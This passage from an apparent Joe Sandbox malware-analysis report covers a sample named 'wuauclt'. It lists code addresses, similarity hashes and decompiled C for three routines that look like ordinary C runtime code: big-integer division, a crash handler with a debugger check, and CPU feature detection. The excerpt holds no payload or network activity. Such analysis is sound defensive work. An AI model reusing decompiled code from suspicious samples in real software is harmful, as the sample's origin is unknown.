                                                0x00263eeb
                                                0x00263ef7
                                                0x00263f02
                                                0x00263f05
                                                0x00263f12
                                                0x00263f15
                                                0x00263f16
                                                0x00263f17
                                                0x00263f1d
                                                0x00263f1f
                                                0x00263f25
                                                0x00263f2b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263f2d
                                                0x00263f2d
                                                0x00263f2d
                                                0x00263f2f
                                                0x00000000
                                                0x00000000
                                                0x00263f31
                                                0x00263f34
                                                0x00000000
                                                0x00263f3a
                                                0x00263f3a
                                                0x00263f3c
                                                0x00263f3e
                                                0x00263f3e
                                                0x00263f3e
                                                0x00263f46
                                                0x00263f49
                                                0x00263f49
                                                0x00263f4f
                                                0x00263f51
                                                0x00263f53
                                                0x00263f5a
                                                0x00263f60
                                                0x00263f62
                                                0x00000000
                                                0x00263f62
                                                0x00000000
                                                0x00263f34
                                                0x00000000
                                                0x00263f2d
                                                0x00000000
                                                0x00263ed1
                                                0x00263e94
                                                0x00263e94
                                                0x00263e96
                                                0x00263e9c
                                                0x00263ea3
                                                0x00263ea3
                                                0x00263ea6
                                                0x00263ea6
                                                0x00000000
                                                0x00263e96
                                                0x00000000
                                                0x00263f7a
                                                0x00263f7a
                                                0x00263f7b
                                                0x00263f7b
                                                0x00000000
                                                0x00263e80
                                                0x00263d9b
                                                0x00263d9b
                                                0x00263dad
                                                0x00263dbc
                                                0x00263dc1
                                                0x00263dc4
                                                0x00263dc6
                                                0x00000000
                                                0x00263dcc
                                                0x00263dcc
                                                0x00263dcf
                                                0x00000000
                                                0x00263dd5
                                                0x00263dd5
                                                0x00263ddc
                                                0x00000000
                                                0x00263de2
                                                0x00263de8
                                                0x00263dea
                                                0x00263df0
                                                0x00263df0
                                                0x00263df2
                                                0x00263df2
                                                0x00263df4
                                                0x00263dfd
                                                0x00263e04
                                                0x00263e07
                                                0x00263e08
                                                0x00263e0a
                                                0x00263e0a
                                                0x00000000
                                                0x00263e12
                                                0x00263ddc
                                                0x00263dcf
                                                0x00263dc6
                                                0x00263cff
                                                0x00263cff
                                                0x00263d05
                                                0x00263d07
                                                0x00263d23
                                                0x00263d26
                                                0x00000000
                                                0x00263d2c
                                                0x00263d2c
                                                0x00263d33
                                                0x00000000
                                                0x00263d39
                                                0x00263d3f
                                                0x00263d41
                                                0x00263d47
                                                0x00263d47
                                                0x00263d49
                                                0x00263d49
                                                0x00263d4b
                                                0x00263d54
                                                0x00263d5b
                                                0x00263d5e
                                                0x00263d5f
                                                0x00263d61
                                                0x00263d61
                                                0x00263d69
                                                0x00263d69
                                                0x00263d6b
                                                0x00000000
                                                0x00263d71
                                                0x00263d71
                                                0x00263d77
                                                0x00263d7a
                                                0x00264044
                                                0x00264047
                                                0x0026404d
                                                0x00264062
                                                0x00264067
                                                0x0026406a
                                                0x00263d80
                                                0x00263d80
                                                0x00263d87
                                                0x00000000
                                                0x00263d87
                                                0x00263d7a
                                                0x00263d6b
                                                0x00263d33
                                                0x00263d09
                                                0x00263d09
                                                0x00263d0b
                                                0x00263d11
                                                0x00263d17
                                                0x00263d18
                                                0x00263f95
                                                0x00263f95
                                                0x00263f9c
                                                0x00263f9d
                                                0x00263f9e
                                                0x00263fa3
                                                0x00263fa6
                                                0x00263fa6
                                                0x00263fa6
                                                0x00263d07
                                                0x00263fa8
                                                0x00263fa8
                                                0x00263faa
                                                0x00264071
                                                0x00264078
                                                0x0026407f
                                                0x00264092
                                                0x00264098
                                                0x00264099
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263fb0

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 88c084a0d9d2255bfe0263fa43e69572a5d777ad31baff7767d8601d3275da34
                                                • Instruction ID: 99c643c1fa52d53515b2037976acd66f15b5bfba38effbe435f1ca537dd8c82b
                                                • Opcode Fuzzy Hash: 88c084a0d9d2255bfe0263fa43e69572a5d777ad31baff7767d8601d3275da34
                                                • Instruction Fuzzy Hash: 79C26C71E286298FDB25CE28DD407EAB7B5EB84305F1441EAD84DE7240E775AEE18F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00262B30(signed int* _a4, char _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int* _v80;
                                                				char _v540;
                                                				signed int _v544;
                                                				signed int _t197;
                                                				signed int _t198;
                                                				intOrPtr _t200;
                                                				signed int _t201;
                                                				signed int _t204;
                                                				signed int _t206;
                                                				signed int _t208;
                                                				signed int _t209;
                                                				signed int _t213;
                                                				signed int _t219;
                                                				intOrPtr _t225;
                                                				void* _t228;
                                                				signed int _t230;
                                                				signed int _t243;
                                                				signed int _t247;
                                                				signed int _t250;
                                                				void* _t253;
                                                				signed int _t256;
                                                				signed int* _t262;
                                                				signed int _t263;
                                                				signed int _t264;
                                                				void* _t265;
                                                				intOrPtr* _t266;
                                                				signed int _t267;
                                                				signed int _t269;
                                                				signed int _t270;
                                                				signed int _t271;
                                                				signed int _t272;
                                                				signed int* _t274;
                                                				signed int* _t278;
                                                				signed int _t279;
                                                				signed int _t280;
                                                				intOrPtr _t282;
                                                				void* _t286;
                                                				signed char _t292;
                                                				signed int _t295;
                                                				signed int _t303;
                                                				signed int _t306;
                                                				signed int _t307;
                                                				signed int _t309;
                                                				signed int _t311;
                                                				signed int _t313;
                                                				intOrPtr* _t314;
                                                				signed int _t318;
                                                				signed int _t322;
                                                				signed int* _t328;
                                                				signed int _t330;
                                                				signed int _t331;
                                                				signed int _t333;
                                                				void* _t334;
                                                				signed int _t336;
                                                				signed int _t338;
                                                				signed int _t341;
                                                				signed int _t342;
                                                				signed int* _t344;
                                                				signed int _t349;
                                                				signed int _t351;
                                                				void* _t355;
                                                				signed int _t359;
                                                				signed int _t360;
                                                				signed int _t362;
                                                				signed int* _t368;
                                                				intOrPtr _t369;
                                                				signed int* _t370;
                                                				signed int* _t373;
                                                
                                                				_t262 = _a4;
                                                				_t197 =  *_t262;
                                                				if(_t197 != 0) {
                                                					_t2 =  &_a8; // 0x26414b
                                                					_t328 =  *_t2;
                                                					_t267 =  *_t328;
                                                					__eflags = _t267;
                                                					if(_t267 != 0) {
                                                						_t3 = _t197 - 1; // -1
                                                						_t349 = _t3;
                                                						_t4 = _t267 - 1; // -1
                                                						_t198 = _t4;
                                                						_v16 = _t349;
                                                						__eflags = _t198;
                                                						if(_t198 != 0) {
                                                							__eflags = _t198 - _t349;
                                                							if(_t198 > _t349) {
                                                								L23:
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								_t46 = _t198 + 1; // 0x0
                                                								_t306 = _t349 - _t198;
                                                								_v60 = _t46;
                                                								_t269 = _t349;
                                                								__eflags = _t349 - _t306;
                                                								if(_t349 < _t306) {
                                                									L21:
                                                									_t306 = _t306 + 1;
                                                									__eflags = _t306;
                                                								} else {
                                                									_t368 =  &(_t262[_t349 + 1]);
                                                									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                									__eflags = _t341;
                                                									while(1) {
                                                										__eflags =  *_t341 -  *_t368;
                                                										if( *_t341 !=  *_t368) {
                                                											break;
                                                										}
                                                										_t269 = _t269 - 1;
                                                										_t341 = _t341 - 4;
                                                										_t368 = _t368 - 4;
                                                										__eflags = _t269 - _t306;
                                                										if(_t269 >= _t306) {
                                                											continue;
                                                										} else {
                                                											goto L21;
                                                										}
                                                										goto L22;
                                                									}
                                                									_t52 =  &_a8; // 0x26414b
                                                									_t369 =  *_t52;
                                                									_t243 = _t269 - _t306;
                                                									__eflags =  *((intOrPtr*)(_t369 + 4 + _t243 * 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                									if( *((intOrPtr*)(_t369 + 4 + _t243 * 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                										goto L21;
                                                									}
                                                								}
                                                								L22:
                                                								__eflags = _t306;
                                                								if(__eflags != 0) {
                                                									_t330 = _v60;
                                                									_t60 =  &_a8; // 0x26414b
                                                									_t200 =  *_t60;
                                                									_t351 =  *(_t200 + _t330 * 4);
                                                									_t201 =  *((intOrPtr*)(_t200 + _t330 * 4 - 4));
                                                									_v36 = _t201;
                                                									asm("bsr eax, esi");
                                                									_v56 = _t351;
                                                									if(__eflags == 0) {
                                                										_t270 = 0x20;
                                                									} else {
                                                										_t270 = 0x1f - _t201;
                                                									}
                                                									_v40 = _t270;
                                                									_v64 = 0x20 - _t270;
                                                									__eflags = _t270;
                                                									if(_t270 != 0) {
                                                										_t292 = _v40;
                                                										_v36 = _v36 << _t292;
                                                										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                										__eflags = _t330 - 2;
                                                										if(_t330 > 2) {
                                                											_t76 =  &_a8; // 0x26414b
                                                											_t81 =  &_v36;
                                                											 *_t81 = _v36 |  *( *_t76 + _t330 * 4 - 8) >> _v64;
                                                											__eflags =  *_t81;
                                                										}
                                                									}
                                                									_v76 = 0;
                                                									_t307 = _t306 + 0xffffffff;
                                                									__eflags = _t307;
                                                									_v32 = _t307;
                                                									if(_t307 < 0) {
                                                										_t331 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										_t85 =  &(_t262[1]); // 0x4
                                                										_v20 =  &(_t85[_t307]);
                                                										_t206 = _t307 + _t330;
                                                										_t90 = _t262 - 4; // -4
                                                										_v12 = _t206;
                                                										_t278 = _t90 + _t206 * 4;
                                                										_v80 = _t278;
                                                										do {
                                                											_t95 =  &_v16; // 0x26414b
                                                											__eflags = _t206 -  *_t95;
                                                											if(_t206 >  *_t95) {
                                                												_t207 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												_t207 = _t278[2];
                                                											}
                                                											__eflags = _v40;
                                                											_t311 = _t278[1];
                                                											_t279 =  *_t278;
                                                											_v52 = _t207;
                                                											_v44 = 0;
                                                											_v8 = _t207;
                                                											_v24 = _t279;
                                                											if(_v40 > 0) {
                                                												_t318 = _v8;
                                                												_t336 = _t279 >> _v64;
                                                												_t230 = E00267740(_t311, _v40, _t318);
                                                												_t279 = _v40;
                                                												_t207 = _t318;
                                                												_t311 = _t336 | _t230;
                                                												_t359 = _v24 << _t279;
                                                												__eflags = _v12 - 3;
                                                												_v8 = _t318;
                                                												_v24 = _t359;
                                                												if(_v12 >= 3) {
                                                													_t279 = _v64;
                                                													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                													__eflags = _t360;
                                                													_t207 = _v8;
                                                													_v24 = _t360;
                                                												}
                                                											}
                                                											_t208 = E002674A0(_t311, _t207, _v56, 0);
                                                											_v44 = _t262;
                                                											_t263 = _t208;
                                                											_v44 = 0;
                                                											_t209 = _t311;
                                                											_v8 = _t263;
                                                											_v28 = _t209;
                                                											_t333 = _t279;
                                                											_v72 = _t263;
                                                											_v68 = _t209;
                                                											__eflags = _t209;
                                                											if(_t209 != 0) {
                                                												L40:
                                                												_t264 = _t263 + 1;
                                                												asm("adc eax, 0xffffffff");
                                                												_t333 = _t333 + E00267540(_t264, _t209, _v56, 0);
                                                												asm("adc esi, edx");
                                                												_t263 = _t264 | 0xffffffff;
                                                												_t209 = 0;
                                                												__eflags = 0;
                                                												_v44 = 0;
                                                												_v8 = _t263;
                                                												_v72 = _t263;
                                                												_v28 = 0;
                                                												_v68 = 0;
                                                											} else {
                                                												__eflags = _t263 - 0xffffffff;
                                                												if(_t263 > 0xffffffff) {
                                                													goto L40;
                                                												}
                                                											}
                                                											__eflags = 0;
                                                											if(0 <= 0) {
                                                												if(0 < 0) {
                                                													goto L44;
                                                												} else {
                                                													__eflags = _t333 - 0xffffffff;
                                                													if(_t333 <= 0xffffffff) {
                                                														while(1) {
                                                															L44:
                                                															_v8 = _v24;
                                                															_t228 = E00267540(_v36, 0, _t263, _t209);
                                                															__eflags = _t311 - _t333;
                                                															if(__eflags < 0) {
                                                																break;
                                                															}
                                                															if(__eflags > 0) {
                                                																L47:
                                                																_t209 = _v28;
                                                																_t263 = _t263 + 0xffffffff;
                                                																_v72 = _t263;
                                                																asm("adc eax, 0xffffffff");
                                                																_t333 = _t333 + _v56;
                                                																__eflags = _t333;
                                                																_v28 = _t209;
                                                																asm("adc dword [ebp-0x28], 0x0");
                                                																_v68 = _t209;
                                                																if(_t333 == 0) {
                                                																	__eflags = _t333 - 0xffffffff;
                                                																	if(_t333 <= 0xffffffff) {
                                                																		continue;
                                                																	} else {
                                                																	}
                                                																}
                                                															} else {
                                                																__eflags = _t228 - _v8;
                                                																if(_t228 <= _v8) {
                                                																	break;
                                                																} else {
                                                																	goto L47;
                                                																}
                                                															}
                                                															L51:
                                                															_v8 = _t263;
                                                															goto L52;
                                                														}
                                                														_t209 = _v28;
                                                														goto L51;
                                                													}
                                                												}
                                                											}
                                                											L52:
                                                											__eflags = _t209;
                                                											if(_t209 != 0) {
                                                												L54:
                                                												_t280 = _v60;
                                                												_t334 = 0;
                                                												_t355 = 0;
                                                												__eflags = _t280;
                                                												if(_t280 != 0) {
                                                													_t144 =  &_a8; // 0x26414b
                                                													_t266 = _v20;
                                                													_t219 =  *_t144 + 4;
                                                													__eflags = _t219;
                                                													_v24 = _t219;
                                                													_v16 = _t280;
                                                													do {
                                                														_v44 =  *_t219;
                                                														_t225 =  *_t266;
                                                														_t286 = _t334 + _v72 * _v44;
                                                														asm("adc esi, edx");
                                                														_t334 = _t355;
                                                														_t355 = 0;
                                                														__eflags = _t225 - _t286;
                                                														if(_t225 < _t286) {
                                                															_t334 = _t334 + 1;
                                                															asm("adc esi, esi");
                                                														}
                                                														 *_t266 = _t225 - _t286;
                                                														_t266 = _t266 + 4;
                                                														_t219 = _v24 + 4;
                                                														_t164 =  &_v16;
                                                														 *_t164 = _v16 - 1;
                                                														__eflags =  *_t164;
                                                														_v24 = _t219;
                                                													} while ( *_t164 != 0);
                                                													_t263 = _v8;
                                                													_t280 = _v60;
                                                												}
                                                												__eflags = 0 - _t355;
                                                												if(__eflags <= 0) {
                                                													if(__eflags < 0) {
                                                														L63:
                                                														__eflags = _t280;
                                                														if(_t280 != 0) {
                                                															_t170 =  &_a8; // 0x26414b
                                                															_t338 = _t280;
                                                															_t314 = _v20;
                                                															_t362 =  *_t170 + 4;
                                                															__eflags = _t362;
                                                															_t265 = 0;
                                                															do {
                                                																_t282 =  *_t314;
                                                																_t362 = _t362 + 4;
                                                																_t314 = _t314 + 4;
                                                																asm("adc eax, eax");
                                                																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                																asm("adc eax, 0x0");
                                                																_t265 = 0;
                                                																_t338 = _t338 - 1;
                                                																__eflags = _t338;
                                                															} while (_t338 != 0);
                                                															_t263 = _v8;
                                                														}
                                                														_t263 = _t263 + 0xffffffff;
                                                														asm("adc dword [ebp-0x18], 0xffffffff");
                                                													} else {
                                                														__eflags = _v52 - _t334;
                                                														if(_v52 < _t334) {
                                                															goto L63;
                                                														}
                                                													}
                                                												}
                                                												_t213 = _v12 - 1;
                                                												__eflags = _t213;
                                                												_v16 = _t213;
                                                											} else {
                                                												__eflags = _t263;
                                                												if(_t263 != 0) {
                                                													goto L54;
                                                												}
                                                											}
                                                											_t331 = 0 + _t263;
                                                											asm("adc esi, 0x0");
                                                											_v20 = _v20 - 4;
                                                											_t313 = _v32 - 1;
                                                											_t262 = _a4;
                                                											_t278 = _v80 - 4;
                                                											_t206 = _v12 - 1;
                                                											_v76 = _t331;
                                                											_v32 = _t313;
                                                											_v80 = _t278;
                                                											_v12 = _t206;
                                                											__eflags = _t313;
                                                										} while (_t313 >= 0);
                                                									}
                                                									_t190 =  &_v16; // 0x26414b
                                                									_t309 =  *_t190 + 1;
                                                									_t204 = _t309;
                                                									__eflags = _t204 -  *_t262;
                                                									if(_t204 <  *_t262) {
                                                										_t274 =  &(_t262[_t204 + 1]);
                                                										do {
                                                											 *_t274 = 0;
                                                											_t274 =  &(_t274[1]);
                                                											_t204 = _t204 + 1;
                                                											__eflags = _t204 -  *_t262;
                                                										} while (_t204 <  *_t262);
                                                									}
                                                									 *_t262 = _t309;
                                                									__eflags = _t309;
                                                									if(_t309 != 0) {
                                                										while(1) {
                                                											_t271 =  *_t262;
                                                											__eflags = _t262[_t271];
                                                											if(_t262[_t271] != 0) {
                                                												goto L78;
                                                											}
                                                											_t272 = _t271 + 0xffffffff;
                                                											__eflags = _t272;
                                                											 *_t262 = _t272;
                                                											if(_t272 != 0) {
                                                												continue;
                                                											}
                                                											goto L78;
                                                										}
                                                									}
                                                									L78:
                                                									return _t331;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						} else {
                                                							_t295 = _t328[1];
                                                							_v44 = _t295;
                                                							__eflags = _t295 - 1;
                                                							if(_t295 != 1) {
                                                								__eflags = _t349;
                                                								if(_t349 != 0) {
                                                									_t342 = 0;
                                                									_v12 = 0;
                                                									_v8 = 0;
                                                									_v20 = 0;
                                                									__eflags = _t349 - 0xffffffff;
                                                									if(_t349 != 0xffffffff) {
                                                										_t25 =  &_v16; // 0x26414b
                                                										_t250 =  *_t25 + 1;
                                                										__eflags = _t250;
                                                										_v32 = _t250;
                                                										_t373 =  &(_t262[_t349 + 1]);
                                                										do {
                                                											_t253 = E002674A0( *_t373, _t342, _t295, 0);
                                                											_v68 = _t303;
                                                											_t373 = _t373 - 4;
                                                											_v20 = _t262;
                                                											_t342 = _t295;
                                                											_t303 = 0 + _t253;
                                                											asm("adc ecx, 0x0");
                                                											_v12 = _t303;
                                                											_t34 =  &_v32;
                                                											 *_t34 = _v32 - 1;
                                                											__eflags =  *_t34;
                                                											_v8 = _v12;
                                                											_t295 = _v44;
                                                										} while ( *_t34 != 0);
                                                										_t262 = _a4;
                                                									}
                                                									_v544 = 0;
                                                									_t41 =  &(_t262[1]); // 0x4
                                                									_t370 = _t41;
                                                									 *_t262 = 0;
                                                									E00260330(_t370, 0x1cc,  &_v540, 0);
                                                									_t247 = _v20;
                                                									__eflags = 0 - _t247;
                                                									 *_t370 = _t342;
                                                									_t262[2] = _t247;
                                                									asm("sbb ecx, ecx");
                                                									__eflags =  ~0x00000000;
                                                									 *_t262 = 0xbadbae;
                                                									return _v12;
                                                								} else {
                                                									_t14 =  &(_t262[1]); // 0x4
                                                									_t344 = _t14;
                                                									_v544 = 0;
                                                									 *_t262 = 0;
                                                									E00260330(_t344, 0x1cc,  &_v540, 0);
                                                									_t256 = _t262[1];
                                                									_t322 = _t256 % _v44;
                                                									__eflags = 0 - _t322;
                                                									 *_t344 = _t322;
                                                									asm("sbb ecx, ecx");
                                                									__eflags = 0;
                                                									 *_t262 =  ~0x00000000;
                                                									return _t256 / _v44;
                                                								}
                                                							} else {
                                                								_t9 =  &(_t262[1]); // 0x4
                                                								_v544 = _t198;
                                                								 *_t262 = _t198;
                                                								E00260330(_t9, 0x1cc,  &_v540, _t198);
                                                								__eflags = 0;
                                                								return _t262[1];
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = 0;
                                                						return 0;
                                                					}
                                                				} else {
                                                					return _t197;
                                                				}
                                                			}
                                                0x00262bf8
                                                0x00262bf8
                                                0x00262b7d
                                                0x00262b80
                                                0x00262b84
                                                0x00262b8a
                                                0x00262b99
                                                0x00262ba3
                                                0x00262bab
                                                0x00262bab
                                                0x00262b7b
                                                0x00262b56
                                                0x00262b59
                                                0x00262b5f
                                                0x00262b5f
                                                0x00262b45
                                                0x00262b4b
                                                0x00262b4b

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: KA&$KA&
                                                • API String ID: 0-957701217
                                                • Opcode ID: 3c569044e724ec21582325f2e63df1ee0d1dc8a02a4197ac015f39958211d29e
                                                • Instruction ID: 7607410826a597a98fdcb7cefe2d13b3c8d0ca404d465e80f632eb66c19f790c
                                                • Opcode Fuzzy Hash: 3c569044e724ec21582325f2e63df1ee0d1dc8a02a4197ac015f39958211d29e
                                                • Instruction Fuzzy Hash: 6D023C71E1061ADBDF14CFA9C8806AEB7F5FF88314F25816AD819E7384D731A9958B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0025B888(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v0;
                                                				signed int _v8;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				void* _v532;
                                                				intOrPtr _v536;
                                                				char _v540;
                                                				intOrPtr _v544;
                                                				intOrPtr _v548;
                                                				intOrPtr _v552;
                                                				intOrPtr _v556;
                                                				intOrPtr _v560;
                                                				intOrPtr _v564;
                                                				intOrPtr _v568;
                                                				intOrPtr _v572;
                                                				intOrPtr _v576;
                                                				intOrPtr _v580;
                                                				intOrPtr _v584;
                                                				char _v724;
                                                				intOrPtr _v792;
                                                				intOrPtr _v800;
                                                				char _v804;
                                                				struct _EXCEPTION_POINTERS _v812;
                                                				signed int _t40;
                                                				char* _t47;
                                                				char* _t49;
                                                				intOrPtr _t61;
                                                				intOrPtr _t62;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				int _t68;
                                                				intOrPtr _t69;
                                                				signed int _t70;
                                                
                                                				_t69 = __esi;
                                                				_t67 = __edi;
                                                				_t66 = __edx;
                                                				_t61 = __ebx;
                                                				_t40 =  *0x271004; // 0x80aab37c
                                                				_t41 = _t40 ^ _t70;
                                                				_v8 = _t40 ^ _t70;
                                                				if(_a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E00257AFB(_t41);
                                                					_pop(_t62);
                                                				}
                                                				E002596C0(_t67,  &_v804, 0, 0x50);
                                                				E002596C0(_t67,  &_v724, 0, 0x2cc);
                                                				_v812.ExceptionRecord =  &_v804;
                                                				_t47 =  &_v724;
                                                				_v812.ContextRecord = _t47;
                                                				_v548 = _t47;
                                                				_v552 = _t62;
                                                				_v556 = _t66;
                                                				_v560 = _t61;
                                                				_v564 = _t69;
                                                				_v568 = _t67;
                                                				_v524 = ss;
                                                				_v536 = cs;
                                                				_v572 = ds;
                                                				_v576 = es;
                                                				_v580 = fs;
                                                				_v584 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t22);
                                                				_v540 = _v0;
                                                				_t49 =  &_v0;
                                                				_v528 = _t49;
                                                				_v724 = 0x10001;
                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                				_v804 = _a8;
                                                				_v800 = _a12;
                                                				_v792 = _v0;
                                                				_t68 = IsDebuggerPresent();
                                                				SetUnhandledExceptionFilter(0);
                                                				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E00257AFB(_t57);
                                                				}
                                                				return E00257097(_v8 ^ _t70, _t69);
                                                			}

                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0025B980
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0025B98A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0025B997
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 5d64911ff69d5314fda72c462975e1cd82d3b118654b5ff42b89fbf091b0881f
                                                • Instruction ID: a42e8e60276f1b256e78cc7edd89c843e4381e54b624f50f29016cd8bca595ec
                                                • Opcode Fuzzy Hash: 5d64911ff69d5314fda72c462975e1cd82d3b118654b5ff42b89fbf091b0881f
                                                • Instruction Fuzzy Hash: F031C47591121D9BCB21DF68D989B9CBBB8BF18311F5041EAE80CA7250EB709F95CF48
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00257BDE(intOrPtr __edx) {
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				intOrPtr _t51;
                                                				signed int _t53;
                                                				signed int _t56;
                                                				signed int _t57;
                                                				intOrPtr _t59;
                                                				signed int _t60;
                                                				signed int _t62;
                                                				intOrPtr _t67;
                                                				intOrPtr _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t78;
                                                				intOrPtr _t83;
                                                				intOrPtr* _t85;
                                                				signed int _t86;
                                                				signed int _t89;
                                                
                                                				_t83 = __edx;
                                                				 *0x273874 =  *0x273874 & 0x00000000;
                                                				 *0x271010 =  *0x271010 | 1;
                                                				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                					L20:
                                                					return 0;
                                                				}
                                                				_v24 = _v24 & 0x00000000;
                                                				 *0x271010 =  *0x271010 | 0x00000002;
                                                				 *0x273874 = 1;
                                                				_t85 =  &_v48;
                                                				_push(1);
                                                				asm("cpuid");
                                                				_pop(_t67);
                                                				 *_t85 = 0;
                                                				 *((intOrPtr*)(_t85 + 4)) = 1;
                                                				 *((intOrPtr*)(_t85 + 8)) = 0;
                                                				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
                                                				_v16 = _v48;
                                                				_t51 = 1;
                                                				asm("sbb cl, cl");
                                                				_t78 = 0;
                                                				_push(1);
                                                				asm("cpuid");
                                                				_pop(_t68);
                                                				 *_t85 = _t51;
                                                				 *((intOrPtr*)(_t85 + 4)) = _t67;
                                                				 *((intOrPtr*)(_t85 + 8)) = _t78;
                                                				 *((intOrPtr*)(_t85 + 0xc)) = _t83;
                                                				if( ~(_v36 ^ 0x49656e69 | _v40 ^ 0x6c65746e | _v44 ^ 0x756e6547) + 1 == 0) {
                                                					L9:
                                                					_t86 =  *0x273878; // 0x2
                                                					L10:
                                                					_v32 = _v36;
                                                					_t53 = _v40;
                                                					_v12 = _t53;
                                                					_v28 = _t53;
                                                					if(_v16 >= 7) {
                                                						_t59 = 7;
                                                						_push(_t68);
                                                						asm("cpuid");
                                                						_t70 =  &_v48;
                                                						 *_t70 = _t59;
                                                						 *((intOrPtr*)(_t70 + 4)) = _t68;
                                                						 *((intOrPtr*)(_t70 + 8)) = 0;
                                                						 *((intOrPtr*)(_t70 + 0xc)) = _t83;
                                                						_t60 = _v44;
                                                						_v24 = _t60;
                                                						_t53 = _v12;
                                                						if((_t60 & 0x00000200) != 0) {
                                                							 *0x273878 = _t86 | 0x00000002;
                                                						}
                                                					}
                                                					if((_t53 & 0x00100000) != 0) {
                                                						 *0x271010 =  *0x271010 | 0x00000004;
                                                						 *0x273874 = 2;
                                                						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
                                                							asm("xgetbv");
                                                							_v20 = _t53;
                                                							_v16 = _t83;
                                                							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                                                								_t56 =  *0x271010; // 0x2f
                                                								_t57 = _t56 | 0x00000008;
                                                								 *0x273874 = 3;
                                                								 *0x271010 = _t57;
                                                								if((_v24 & 0x00000020) != 0) {
                                                									 *0x273874 = 5;
                                                									 *0x271010 = _t57 | 0x00000020;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L20;
                                                				}
                                                				_t62 = _v48 & 0x0fff3ff0;
